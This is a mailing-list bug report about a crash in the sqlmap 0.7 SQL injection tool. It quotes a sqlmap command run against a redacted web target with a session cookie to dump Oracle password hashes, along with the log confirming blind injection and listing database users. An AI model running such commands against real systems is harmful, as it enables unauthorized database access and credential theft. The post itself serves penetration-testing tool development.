[sqlmap-users] sqlmap error message

SourceForge Headquarters 1320 Columbia Street Suite 310 San Diego, CA 92101 +1 (858) 422-6466

Hi,

Below you'll find a sqlmap error message:

//----------------------------------------------------------------------------
D:\sqlmap-0.7_exe>sqlmap.exe -u "https://****/****/****.do?p=2&****=0&rowsp
erpage=20&order_by=UPPER_NAME&asc_desc=ASC&responsibility=%2B" --cookie
"JSESSIONID=****;"  -p **** --passwords

    sqlmap/0.7
    by Bernardo Damele A. G. <ber...@gm...>

[*] starting at: 16:25:42

[16:25:42] [WARNING] the testable parameter '****' you provided is not
into the Cookie
[16:25:42] [INFO] testing connection to the target url
[16:25:43] [INFO] testing if the url is stable, wait a few seconds
[16:25:48] [INFO] url is stable
[16:25:48] [INFO] testing sql injection on GET parameter '****' with 0
parenthesis
[16:25:48] [INFO] testing unescaped numeric injection on GET parameter '****'
[16:26:11] [INFO] confirming unescaped numeric injection on GET parameter
'****'
[16:26:16] [INFO] GET parameter '****' is unescaped numeric injectable
with 0 parenthesis
[16:26:16] [INFO] testing for parenthesis on injectable parameter
[16:26:35] [INFO] the injectable parameter requires 0 parenthesis
[16:26:35] [INFO] testing MySQL
[16:26:41] [WARNING] the back-end DMBS is not MySQL
[16:26:41] [INFO] testing Oracle
[16:26:58] [INFO] confirming Oracle
[16:27:17] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle

[16:27:17] [INFO] fetching database users password hashes
[16:27:17] [INFO] fetching database users
[16:27:17] [INFO] fetching number of database users
[16:27:17] [INFO] retrieved: 92
[16:29:32] [INFO] retrieved: CTXSYS
[16:40:04] [INFO] retrieved: EXFSYS
<50 lines removed>
[03:02:00] [INFO] retrieved: PN
[03:07:59] [ERROR] unhandled exception in sqlmap/0.7, please copy the
command line and th
e following text and send by e-mail to sql...@li....
The developer will fix it as soon as possible
:
sqlmap version: 0.7
Python version: 2.6.1
Operating system: win32
Traceback (most recent call last):
  File "sqlmap.py", line 84, in main
  File "lib\controller\controller.pyc", line 263, in start
  File "lib\controller\action.pyc", line 101, in action
  File "plugins\generic\enumeration.pyc", line 277, in getPasswordHashes
  File "plugins\generic\enumeration.pyc", line 210, in getUsers
  File "lib\request\inject.pyc", line 378, in getValue
  File "lib\request\inject.pyc", line 308, in __goInferenceProxy
  File "lib\request\inject.pyc", line 99, in __goInferenceFields
  File "lib\request\inject.pyc", line 58, in __goInference
  File "lib\techniques\blind\inference.pyc", line 232, in bisection
  File "lib\techniques\blind\inference.pyc", line 106, in getChar
  File "lib\request\connect.pyc", line 274, in queryPage
  File "lib\request\connect.pyc", line 197, in getPage
UnboundLocalError: local variable 'warnMsg' referenced before assignment

[*] shutting down at: 03:07:59
//----------------------------------------------------------------------------

The problem might (I'm not sure) have something to do with the sessionID
since it was expired when I checked it the next morning.

I also mentioned that a number of functions is not (yet) implemented for
Oracle databases. I used to do lots of Oracle pentests in the past and
wrote lots of tools including support for command execution on Oracle
(with Java enabled) and password crackers
<http://www.thc.org/thc-orakelcrackert11g>
<http://www.thc.org/thc-orakel>. Please let me know if help is
appreciated.

Cheers,

Jeroen